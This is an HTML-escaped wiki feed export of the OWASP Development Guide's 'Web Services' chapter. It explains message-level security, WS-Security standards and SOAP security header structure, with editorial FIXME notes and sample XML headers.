Key management usually lies at the foundation of any other security activity, as most protection mechanisms rely on cryptographic keys one way or another. While Web Services have XKMS protocol for key distribution, local key management still presents a huge challenge in most cases, since PKI mechanism has a lot of well-documented deployment and usability issues. Those systems that opt to use homegrown mechanisms for key management run significant risks in many cases, since questions of storing, updating, and recovering secret and private keys more often than not are not adequately addressed in such solutions.&lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
* SearchSOA, SOA needs practical operational governance, Toufic Boubez&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://searchsoa.techtarget.com/news/interview/0,289202,sid26_gci1288649,00.html?track=NL-110&amp;amp;ad=618937&amp;amp;asrc=EM_NLN_2827289&amp;amp;uid=4724698&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Whitepaper: Securing XML Web Services: XML Firewalls and XML VPNs&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://layer7tech.com/new/library/custompage.html?id=4&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* eBizQ, The Challenges of SOA Security, Peter Schooff&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.ebizq.net/blogs/news_security/2008/01/the_complexity_of_soa_security.php&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Piliptchouk, D., WS-Security in the Enterprise, O’Reilly ONJava&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/2005/02/09/wssecurity.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/2005/03/30/wssecurity2.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* WS-Security OASIS site&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.oasis-open.org/committees/tc_home.php?wg_abbrev=wss&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Microsoft, ''What’s new with WSE 3.0''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://msdn.microsoft.com/webservices/webservices/building/wse/default.aspx?pull=/library/en-us/dnwse/html/newwse3.asp&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Eoin Keary, Preventing DOS attacks on web services&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;https://www.threatsandcountermeasures.com/wiki/default.aspx/ThreatsAndCountermeasuresCommunityKB.PreventingDOSAttacksOnWebServices&amp;lt;/u&amp;gt;&lt;br /&gt;
[[category:FIXME | broken link]]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Reference==&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:Web Services]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Web_Services&amp;diff=59465</id>
		<title>Web Services</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Web_Services&amp;diff=59465"/>
				<updated>2009-04-26T11:37:58Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Standards committees */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
__TOC__&lt;br /&gt;
[[Category:FIXME|This article has a lot of what I think are placeholders for references. It says &amp;quot;see section 0&amp;quot; and I think those are intended to be replaced with actual sections. I have noted them where I have found them. Need to figure out what those intended to reference, and change the reference]]&lt;br /&gt;
This section of the Development Guide details the common issues facing Web services developers, and methods to address common issues. Due to the space limitations, it cannot look at all of the surrounding issues in great detail, since each of them deserves a separate book of its own. Instead, an attempt is made to steer the reader to the appropriate usage patterns, and warn about potential roadblocks on the way.&lt;br /&gt;
&lt;br /&gt;
Web Services have received a lot of press, and with that comes a great deal of confusion over what they really are. Some are heralding Web Services as the biggest technology breakthrough since the web itself; others are more skeptical that they are nothing more than evolved web applications. In either case, the issues of web application security apply to web services just as they do to web applications. &lt;br /&gt;
&lt;br /&gt;
==What are Web Services?==&lt;br /&gt;
&lt;br /&gt;
Suppose you were making an application that you wanted other applications to be able to communicate with.  For example, your Java application has stock information updated every 5 minutes and you would like other applications, ones that may not even exist yet, to be able to use the data.&lt;br /&gt;
&lt;br /&gt;
One way you can do this is to serialize your Java objects and send them over the wire to the application that requests them.  The problem with this approach is that a C# application would not be able to use these objects because it serializes and deserializes objects differently than Java.  &lt;br /&gt;
&lt;br /&gt;
Another approach you could take is to send a text file filled with data to the application that requests it.  This is better because a C# application could read the data.  But this has another flaw:  Lets assume your stock application is not the only one the C# application needs to interact with.  Maybe it needs weather data, local restaurant data, movie data, etc.  If every one of these applications uses its own unique file format, it would take considerable research to get the C# application to a working state.  &lt;br /&gt;
&lt;br /&gt;
The solution to both of these problems is to send a standard file format.  A format that any application can use, regardless of the data being transported.  Web Services are this solution.  They let any application communicate with any other application without having to consider the language it was developed in or the format of the data.  &lt;br /&gt;
&lt;br /&gt;
At the simplest level, web services can be seen as a specialized web application that differs mainly at the presentation tier level. While web applications typically are HTML-based, web services are XML-based. Interactive users for B2C (business to consumer) transactions normally access web applications, while web services are employed as building blocks by other web applications for forming B2B (business to business) chains using the so-called SOA model. Web services typically present a public functional interface, callable in a programmatic fashion, while web applications tend to deal with a richer set of features and are content-driven in most cases. &lt;br /&gt;
&lt;br /&gt;
==Securing Web Services ==&lt;br /&gt;
&lt;br /&gt;
Web services, like other distributed applications, require protection at multiple levels:&lt;br /&gt;
&lt;br /&gt;
* SOAP messages that are sent on the wire should be delivered confidentially and without tampering&lt;br /&gt;
&lt;br /&gt;
* The server needs to be confident who it is talking to and what the clients are entitled to&lt;br /&gt;
&lt;br /&gt;
* The clients need to know that they are talking to the right server, and not a phishing site (see the Phishing chapter for more information)&lt;br /&gt;
&lt;br /&gt;
* System message logs should contain sufficient information to reliably reconstruct the chain of events and track those back to the authenticated callers&lt;br /&gt;
&lt;br /&gt;
Correspondingly, the high-level approaches to solutions, discussed in the following sections, are valid for pretty much any distributed application, with some variations in the implementation details.&lt;br /&gt;
&lt;br /&gt;
The good news for Web Services developers is that these are infrastructure-level tasks, so, theoretically, it is only the system administrators who should be worrying about these issues. However, for a number of reasons discussed later in this chapter, WS developers usually have to be at least aware of all these risks, and oftentimes they still have to resort to manually coding or tweaking the protection components.&lt;br /&gt;
&lt;br /&gt;
==Communication security ==&lt;br /&gt;
&lt;br /&gt;
There is a commonly cited statement, and even more often implemented approach – “we are using SSL to protect all communication, we are secure”. At the same time, there have been so many articles published on the topic of “channel security vs. token security” that it hardly makes sense to repeat those arguments here. Therefore, listed below is just a brief rundown of most common pitfalls when using channel security alone:&lt;br /&gt;
&lt;br /&gt;
* It provides only “point-to-point” security&lt;br /&gt;
&lt;br /&gt;
Any communication with multiple “hops” requires establishing separate channels (and trusts) between each communicating node along the way. There is also a subtle issue of trust transitivity, as trusts between node pairs {A,B} and {B,C} do not automatically imply {A,C} trust relationship.&lt;br /&gt;
&lt;br /&gt;
* Storage issue&lt;br /&gt;
&lt;br /&gt;
After messages are received on the server (even if it is not the intended recipient), they exist in the clear-text form, at least – temporarily. Storing the transmitted information at the intermediate aggravates the problem or destination servers in log files (where it can be browsed by anybody) and local caches.&lt;br /&gt;
&lt;br /&gt;
* Lack of interoperability&lt;br /&gt;
&lt;br /&gt;
While SSL provides a standard mechanism for transport protection, applications then have to utilize highly proprietary mechanisms for transmitting credentials, ensuring freshness, integrity, and confidentiality of data sent over the secure channel. Using a different server, which is semantically equivalent, but accepts a different format of the same credentials, would require altering the client and prevent forming automatic B2B service chains. &lt;br /&gt;
&lt;br /&gt;
Standards-based token protection in many cases provides a superior alternative for message-oriented Web Service SOAP communication model.&lt;br /&gt;
&lt;br /&gt;
That said – the reality is that the most Web Services today are still protected by some form of channel security mechanism, which alone might suffice for a simple internal application. However, one should clearly realize the limitations of such approach, and make conscious trade-offs at the design time, whether channel, token, or combined protection would work better for each specific case.&lt;br /&gt;
&lt;br /&gt;
==Passing credentials ==&lt;br /&gt;
&lt;br /&gt;
In order to enable credentials exchange and authentication for Web Services, their developers must address the following issues.&lt;br /&gt;
&lt;br /&gt;
First, since SOAP messages are XML-based, all passed credentials have to be converted to text format. This is not a problem for username/password types of credentials, but binary ones (like X.509 certificates or Kerberos tokens) require converting them into text prior to sending and unambiguously restoring them upon receiving, which is usually done via a procedure called Base64 encoding and decoding.&lt;br /&gt;
&lt;br /&gt;
Second, passing credentials carries an inherited risk of their disclosure – either by sniffing them during the wire transmission, or by analyzing the server logs. Therefore, things like passwords and private keys need to be either encrypted, or just never sent “in the clear”. Usual ways to avoid sending sensitive credentials are using cryptographic hashing and/or signatures.&lt;br /&gt;
&lt;br /&gt;
==Ensuring message freshness ==&lt;br /&gt;
&lt;br /&gt;
Even a valid message may present a danger if it is utilized in a “replay attack” – i.e. it is sent multiple times to the server to make it repeat the requested operation. This may be achieved by capturing an entire message, even if it is sufficiently protected against tampering, since it is the message itself that is used for attack now (see the XML Injection section of the Interpreter Injection chapter).&lt;br /&gt;
&lt;br /&gt;
Usual means to protect against replayed messages is either using unique identifiers (nonces) on messages and keeping track of processed ones, or using a relatively short validity time window. In the Web Services world, information about the message creation time is usually communicated by inserting timestamps, which may just tell the instant the message was created, or have additional information, like its expiration time, or certain conditions.&lt;br /&gt;
&lt;br /&gt;
The latter solution, although easier to implement, requires clock synchronization and is sensitive to “server time skew,” whereas server or clients' clocks drift too much, preventing timely message delivery, although this usually does not present significant problems with modern-day computers. A greater issue lies with message queuing at the servers, where messages may be expiring while waiting to be processed in the queue of an especially busy or non-responsive server.&lt;br /&gt;
&lt;br /&gt;
==Protecting message integrity ==&lt;br /&gt;
&lt;br /&gt;
When a message is received by a web service, it must always ask two questions: “whether I trust the caller,” “whether it created this message.” Assuming that the caller trust has been established one way or another, the server has to be assured that the message it is looking at was indeed issued by the caller, and not altered along the way (intentionally or not). This may affect technical qualities of a SOAP message, such as the message’s timestamp, or business content, such as the amount to be withdrawn from the bank account. Obviously, neither change should go undetected by the server.&lt;br /&gt;
&lt;br /&gt;
In communication protocols, there are usually some mechanisms like checksum applied to ensure packet’s integrity. This would not be sufficient, however, in the realm of publicly exposed Web Services, since checksums (or digests, their cryptographic equivalents) are easily replaceable and cannot be reliably tracked back to the issuer. The required association may be established by utilizing HMAC, or by combining message digests with either cryptographic signatures or with secret key-encryption (assuming the keys are only known to the two communicating parties) to ensure that any change will immediately result in a cryptographic error.&lt;br /&gt;
&lt;br /&gt;
==Protecting message confidentiality ==&lt;br /&gt;
&lt;br /&gt;
Oftentimes, it is not sufficient to ensure the integrity – in many cases it is also desirable that nobody can see the data that is passed around and/or stored locally. It may apply to the entire message being processed, or only to certain parts of it – in either case, some type of encryption is required to conceal the content. Normally, symmetric encryption algorithms are used to encrypt bulk data, since it is significantly faster than the asymmetric ones. Asymmetric encryption is then applied to protect the symmetric session keys, which, in many implementations, are valid for one communication only and are subsequently discarded.&lt;br /&gt;
&lt;br /&gt;
Applying encryption requires conducting an extensive setup work, since the communicating parties now have to be aware of which keys they can trust, deal with certificate and key validation, and know which keys should be used for communication.&lt;br /&gt;
&lt;br /&gt;
In many cases, encryption is combined with signatures to provide both integrity and confidentiality. Normally, signing keys are different from the encrypting ones, primarily because of their different lifecycles – signing keys are permanently associated with their owners, while encryption keys may be invalidated after the message exchange. Another reason may be separation of business responsibilities - the signing authority (and the corresponding key) may belong to one department or person, while encryption keys are generated by the server controlled by members of IT department. &lt;br /&gt;
&lt;br /&gt;
==Access control ==&lt;br /&gt;
&lt;br /&gt;
After the message has been received and successfully validated, the server must decide:&lt;br /&gt;
&lt;br /&gt;
* Does it know who is requesting the operation (Identification)&lt;br /&gt;
&lt;br /&gt;
* Does it trust the caller’s identity claim (Authentication)&lt;br /&gt;
&lt;br /&gt;
* Does it allow the caller to perform this operation (Authorization)&lt;br /&gt;
&lt;br /&gt;
There is not much WS-specific activity that takes place at this stage – just several new ways of passing the credentials for authentication. Most often, authorization (or entitlement) tasks occur completely outside of the Web Service implementation, at the Policy Server that protects the whole domain.&lt;br /&gt;
&lt;br /&gt;
There is another significant problem here – the traditional HTTP firewalls do not help at stopping attacks at the Web Services. An organization would need an XML/SOAP firewall, which is capable of conducting application-level analysis of the web server’s traffic and make intelligent decision about passing SOAP messages to their destination. The reader would need to refer to other books and publications on this very important topic, as it is impossible to cover it within just one chapter.&lt;br /&gt;
&lt;br /&gt;
==Audit ==&lt;br /&gt;
&lt;br /&gt;
A common task, typically required from the audits, is reconstructing the chain of events that led to a certain problem. Normally, this would be achieved by saving server logs in a secure location, available only to the IT administrators and system auditors, in order to create what is commonly referred to as “audit trail”. Web Services are no exception to this practice, and follow the general approach of other types of Web Applications.&lt;br /&gt;
&lt;br /&gt;
Another auditing goal is non-repudiation, meaning that a message can be verifiably traced back to the caller. Following the standard legal practice, electronic documents now require some form of an “electronic signature”, but its definition is extremely broad and can mean practically anything – in many cases, entering your name and birthday qualifies as an e-signature.&lt;br /&gt;
&lt;br /&gt;
As far as the WS are concerned, such level of protection would be insufficient and easily forgeable. The standard practice is to require cryptographic digital signatures over any content that has to be legally binding – if a document with such a signature is saved in the audit log, it can be reliably traced to the owner of the signing key. &lt;br /&gt;
&lt;br /&gt;
==Web Services Security Hierarchy ==&lt;br /&gt;
&lt;br /&gt;
Technically speaking, Web Services themselves are very simple and versatile – XML-based communication, described by an XML-based grammar, called Web Services Description Language (WSDL, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2005/WD-wsdl20-20050510&amp;lt;/u&amp;gt;), which binds abstract service interfaces, consisting of messages, expressed as XML Schema, and operations, to the underlying wire format. Although it is by no means a requirement, the format of choice is currently SOAP over HTTP. This means that Web Service interfaces are described in terms of the incoming and outgoing SOAP messages, transmitted over HTTP protocol.&lt;br /&gt;
&lt;br /&gt;
===Standards committees ===&lt;br /&gt;
&lt;br /&gt;
Before reviewing the individual standards, it is worth taking a brief look at the organizations which are developing and promoting them. There are quite a few industry-wide groups and consortiums working in this area, most important of which are listed below. &lt;br /&gt;
&lt;br /&gt;
W3C (see &amp;lt;u&amp;gt;http://www.w3.org&amp;lt;/u&amp;gt;) is the most well known industry group, which owns many Web-related standards and develops them in Working Group format. Of particular interest to this chapter are XML Schema, SOAP, XML-dsig, XML-enc, and WSDL standards (called recommendations in the W3C’s jargon).&lt;br /&gt;
&lt;br /&gt;
OASIS (see &amp;lt;u&amp;gt;http://www.oasis-open.org&amp;lt;/u&amp;gt;) mostly deals with Web Service-specific standards, not necessarily security-related. It also operates on a committee basis, forming so-called Technical Committees (TC) for the standards that it is going to be developing. Of interest for this discussion, OASIS owns WS-Security and SAML standards. &lt;br /&gt;
&lt;br /&gt;
Web Services Interoperability Organization (WS-I, see &amp;lt;u&amp;gt;http://www.ws-i.org/&amp;lt;/u&amp;gt;) was formed to promote a general framework for interoperable Web Services. Mostly its work consists of taking other broadly accepted standards, and developing so-called profiles, or sets of requirements for conforming Web Service implementations. In particular, its Basic Security Profile (BSP) relies on the OASIS’ WS-Security standard and specifies sets of optional and required security features in Web Services that claim interoperability.&lt;br /&gt;
&lt;br /&gt;
Liberty Alliance (LA, see &amp;lt;u&amp;gt;http://projectliberty.org&amp;lt;/u&amp;gt;) consortium was formed to develop and promote an interoperable Identity Federation framework. Although this framework is not strictly Web Service-specific, but rather general, it is important for this topic because of its close relation with the SAML standard developed by OASIS. &lt;br /&gt;
&lt;br /&gt;
Besides the previously listed organizations, there are other industry associations, both permanently established and short-lived, which push forward various Web Service security activities. They are usually made up of software industry’s leading companies, such as Microsoft, IBM, Verisign, BEA, Sun, and others, that join them to work on a particular issue or proposal. Results of these joint activities, once they reach certain maturity, are often submitted to standardizations committees as a basis for new industry standards.&lt;br /&gt;
&lt;br /&gt;
==SOAP ==&lt;br /&gt;
&lt;br /&gt;
Simple Object Access Protocol (SOAP, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2003/REC-soap12-part1-20030624/&amp;lt;/u&amp;gt;) provides an XML-based framework for exchanging structured and typed information between peer services. This information, formatted into Header and Body, can theoretically be transmitted over a number of transport protocols, but only HTTP binding has been formally defined and is in active use today. SOAP provides for Remote Procedure Call-style (RPC) interactions, similar to remote function calls, and Document-style communication, with message contents based exclusively on XML Schema definitions in the Web Service’s WSDL. Invocation results may be optionally returned in the response message, or a Fault may be raised, which is roughly equivalent to using exceptions in traditional programming languages.&lt;br /&gt;
&lt;br /&gt;
SOAP protocol, while defining the communication framework, provides no help in terms of securing message exchanges – the communications must either happen over secure channels, or use protection mechanisms described later in this chapter. &lt;br /&gt;
&lt;br /&gt;
===XML security specifications (XML-dsig &amp;amp; Encryption) ===&lt;br /&gt;
&lt;br /&gt;
XML Signature (XML-dsig, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2002/REC-xmldsig-core-20020212&amp;lt;/u&amp;gt;/), and XML Encryption (XML-enc, see &amp;lt;u&amp;gt;http://www.w3.org/TR/2002/REC-xmlenc-core-20021210/&amp;lt;/u&amp;gt;) add cryptographic protection to plain XML documents. These specifications add integrity, message and signer authentication, as well as support for encryption/decryption of whole XML documents or only of some elements inside them. &lt;br /&gt;
&lt;br /&gt;
The real value of those standards comes from the highly flexible framework developed to reference the data being processed (both internal and external relative to the XML document), refer to the secret keys and key pairs, and to represent results of signing/encrypting operations as XML, which is added to/substituted in the original document.&lt;br /&gt;
&lt;br /&gt;
However, by themselves, XML-dsig and XML-enc do not solve the problem of securing SOAP-based Web Service interactions, since the client and service first have to agree on the order of those operations, where to look for the signature, how to retrieve cryptographic tokens, which message elements should be signed and encrypted, how long a message is considered to be valid, and so on. These issues are addressed by the higher-level specifications, reviewed in the following sections.&lt;br /&gt;
&lt;br /&gt;
===Security specifications ===&lt;br /&gt;
&lt;br /&gt;
In addition to the above standards, there is a broad set of security-related specifications being currently developed for various aspects of Web Service operations. &lt;br /&gt;
&lt;br /&gt;
One of them is SAML, which defines how identity, attribute, and authorization assertions should be exchanged among participating services in a secure and interoperable way. &lt;br /&gt;
&lt;br /&gt;
A broad consortium, headed by Microsoft and IBM, with the input from Verisign, RSA Security, and other participants, developed a family of specifications, collectively known as “Web Services Roadmap”. Its foundation, WS-Security, has been submitted to OASIS and became an OASIS standard in 2004. Other important specifications from this family are still found in different development stages, and plans for their submission have not yet been announced, although they cover such important issues as security policies (WS-Policy et al), trust issues and security token exchange (WS-Trust), establishing context for secure conversation (WS-SecureConversation). One of the specifications in this family, WS-Federation, directly competes with the work being done by the LA consortium, and, although it is supposed to be incorporated into the Longhorn release of Windows, its future is not clear at the moment, since it has been significantly delayed and presently does not have industry momentum behind it.&lt;br /&gt;
&lt;br /&gt;
==WS-Security Standard ==&lt;br /&gt;
&lt;br /&gt;
WS-Security specification (WSS) was originally developed by Microsoft, IBM, and Verisign as part of a “Roadmap”, which was later renamed to Web Services Architecture, or WSA. WSS served as the foundation for all other specifications in this domain, creating a basic infrastructure for developing message-based security exchange. Because of its importance for establishing interoperable Web Services, it was submitted to OASIS and, after undergoing the required committee process, became an officially accepted standard. Current version is 1.0, and the work on the version 1.1 of the specification is under way and is expected to be finishing in the second half of 2005.&lt;br /&gt;
[[category:FIXME | outdated info? is it complete now?]]&lt;br /&gt;
&lt;br /&gt;
===Organization of the standard ===&lt;br /&gt;
&lt;br /&gt;
The WSS standard itself deals with several core security areas, leaving many details to so-called profile documents. The core areas, broadly defined by the standard, are: &lt;br /&gt;
&lt;br /&gt;
* Ways to add security headers (WSSE Header) to SOAP Envelopes&lt;br /&gt;
&lt;br /&gt;
* Attachment of security tokens and credentials to the message &lt;br /&gt;
&lt;br /&gt;
* Inserting a timestamp&lt;br /&gt;
&lt;br /&gt;
* Signing the message&lt;br /&gt;
&lt;br /&gt;
* Encrypting the message	&lt;br /&gt;
&lt;br /&gt;
* Extensibility&lt;br /&gt;
&lt;br /&gt;
Flexibility of the WS-Security standard lies in its extensibility, so that it remains adaptable to new types of security tokens and protocols that are being developed. This flexibility is achieved by defining additional profiles for inserting new types of security tokens into the WSS framework. While the signing and encrypting parts of the standards are not expected to require significant changes (only when the underlying XML-dsig and XML-enc are updated), the types of tokens, passed in WSS messages, and ways of attaching them to the message may vary substantially. At the high level the WSS standard defines three types of security tokens, attachable to a WSS Header: Username/password, Binary, and XML tokens. Each of those types is further specified in one (or more) profile document, which defines additional tokens' attributes and elements, needed to represent a particular type of security token. &lt;br /&gt;
&lt;br /&gt;
[[Image:WSS_Specification_Hierarchy.gif|Figure 4: WSS specification hierarchy]]&lt;br /&gt;
&lt;br /&gt;
===Purpose ===&lt;br /&gt;
&lt;br /&gt;
The primary goal of the WSS standard is providing tools for message-level communication protection, whereas each message represents an isolated piece of information, carrying enough security data to verify all important message properties, such as: authenticity, integrity, freshness, and to initiate decryption of any encrypted message parts. This concept is a stark contrast to the traditional channel security, which methodically applies pre-negotiated security context to the whole stream, as opposed to the selective process of securing individual messages in WSS. In the Roadmap, that type of service is eventually expected to be provided by implementations of standards like WS-SecureConversation.&lt;br /&gt;
&lt;br /&gt;
From the beginning, the WSS standard was conceived as a message-level toolkit for securely delivering data for higher level protocols. Those protocols, based on the standards like WS-Policy, WS-Trust, and Liberty Alliance, rely on the transmitted tokens to implement access control policies, token exchange, and other types of protection and integration. However, taken alone, the WSS standard does not mandate any specific security properties, and an ad-hoc application of its constructs can lead to subtle security vulnerabilities and hard to detect problems, as is also discussed in later sections of this chapter.&lt;br /&gt;
&lt;br /&gt;
==WS-Security Building Blocks ==&lt;br /&gt;
&lt;br /&gt;
The WSS standard actually consists of a number of documents – one core document, which defines how security headers may be included into SOAP envelope and describes all high-level blocks, which must be present in a valid security header. Profile documents have the dual task of extending definitions for the token types they are dealing with, providing additional attributes, elements, as well as defining relationships left out of the core specification, such as using attachments.&lt;br /&gt;
&lt;br /&gt;
Core WSS 1.1 specification, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16790/wss-v1.1-spec-os-SOAPMessageSecurity.pdf&amp;lt;/u&amp;gt;, defines several types of security tokens (discussed later in this section – see 0), ways to reference them, timestamps, and ways to apply XML-dsig and XML-enc in the security headers – see the XML Dsig section for more details about their general structure.&lt;br /&gt;
&lt;br /&gt;
Associated specifications are:&lt;br /&gt;
&lt;br /&gt;
* Username token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16782/wss-v1.1-spec-os-UsernameTokenProfile.pdf&amp;lt;/u&amp;gt;, which adds various password-related extensions to the basic UsernameToken from the core specification&lt;br /&gt;
&lt;br /&gt;
* X.509 token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16785/wss-v1.1-spec-os-x509TokenProfile.pdf&amp;lt;/u&amp;gt; which specifies, how X.509 certificates may be passed in the BinarySecurityToken, specified by the core document&lt;br /&gt;
&lt;br /&gt;
* SAML Token profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16768/wss-v1.1-spec-os-SAMLTokenProfile.pdf&amp;lt;/u&amp;gt; that specifies how XML-based SAML tokens can be inserted into WSS headers.&lt;br /&gt;
&lt;br /&gt;
*  Kerberos Token Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16788/wss-v1.1-spec-os-KerberosTokenProfile.pdf&amp;lt;/u&amp;gt; that defines how to encode Kerberos tickets and attach them to SOAP messages.&lt;br /&gt;
&lt;br /&gt;
* Rights Expression Language (REL) Token Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16687/oasis-wss-rel-token-profile-1.1.pdf&amp;lt;/u&amp;gt; that describes the use of ISO/IEC 21000-5 Rights Expressions with respect to the WS-Security specification.&lt;br /&gt;
&lt;br /&gt;
* SOAP with Attachments (SWA) Profile 1.1, located at &amp;lt;u&amp;gt;http://www.oasis-open.org/committees/download.php/16672/wss-v1.1-spec-os-SwAProfile.pdf&amp;lt;/u&amp;gt; that describes how to use WSS-Sec with SOAP Messages with Attachments.&lt;br /&gt;
&lt;br /&gt;
===How data is passed ===&lt;br /&gt;
&lt;br /&gt;
WSS security specification deals with two distinct types of data: security information, which includes security tokens, signatures, digests, etc; and message data, i.e. everything else that is passed in the SOAP message. Being an XML-based standard, WSS works with textual information grouped into XML elements. Any binary data, such as cryptographic signatures or Kerberos tokens, has to go through a special transform, called Base64 encoding/decoding, which provides straightforward conversion from binary to ASCII formats and back. The example below demonstrates how binary data looks like in the encoded format:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''cCBDQTAeFw0wNDA1MTIxNjIzMDRaFw0wNTA1MTIxNjIzMDRaMG8xCz''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
After encoding a binary element, an attribute with the algorithm’s identifier is added to the XML element carrying the data, so that the receiver would know to apply the correct decoder to read it. These identifiers are defined in the WSS specification documents.&lt;br /&gt;
&lt;br /&gt;
===Security header’s structure ===&lt;br /&gt;
&lt;br /&gt;
A security header in a message is used as a sort of an envelope around a letter – it seals and protects the letter, but does not care about its content. This “indifference” works in the other direction as well, as the letter (SOAP message) should not know, nor should it care about its envelope (WSS Header), since the different units of information, carried on the envelope and in the letter, are presumably targeted at different people or applications.&lt;br /&gt;
&lt;br /&gt;
A SOAP Header may actually contain multiple security headers, as long as they are addressed to different actors (for SOAP 1.1), or roles (for SOAP 1.2). Their contents may also be referring to each other, but such references present a very complicated logistical problem for determining the proper order of decryptions/signature verifications, and should generally be avoided. WSS security header itself has a loose structure, as the specification itself does not require any elements to be present – so, the minimalist header with an empty message will look like:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''&amp;lt;soap:Envelope xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;soap:Header&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''        &amp;lt;wsse:Security xmlns:wsse=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; soap:mustUnderstand=&amp;quot;1&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''        ''&lt;br /&gt;
&lt;br /&gt;
''        &amp;lt;/wsse:Security&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;/soap:Header&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;soap:Body&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;/soap:Body&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''&amp;lt;/soap:Envelope&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
However, to be useful, it must carry some information, which is going to help securing the message. It means including one or more security tokens (see 0) with references, XML Signature, and XML Encryption elements, if the message is signed and/or encrypted. So, a typical header will look more like the following picture: &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''&amp;lt;soap:Envelope xmlns:soap=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''  &amp;lt;soap:Header&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''    &amp;lt;wsse:Security xmlns=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsse=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd&amp;quot; xmlns:wsu=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd&amp;quot; soap:mustUnderstand=&amp;quot;1&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;wsse:BinarySecurityToken EncodingType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot; wsu:Id=&amp;quot;aXhOJ5&amp;quot;&amp;gt;MIICtzCCAi... ''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;/wsse:BinarySecurityToken&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''      &amp;lt;xenc:EncryptedKey xmlns:xenc=&amp;quot;http://www.w3.org/2001/04/xmlenc#&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''        &amp;lt;xenc:EncryptionMethod Algorithm=&amp;quot;http://www.w3.org/2001/04/xmlenc#rsa-1_5&amp;quot;/&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	&amp;lt;dsig:KeyInfo xmlns:dsig=&amp;quot;http://www.w3.org/2000/09/xmldsig#&amp;quot;&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	  &amp;lt;wsse:SecurityTokenReference&amp;gt;''&lt;br /&gt;
&lt;br /&gt;
''	    &amp;lt;wsse:Reference URI=&amp;quot;#aXhOJ5&amp;quot; ValueType=&amp;quot;http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509v3&amp;quot;/&amp;gt;''&lt;br /&gt;
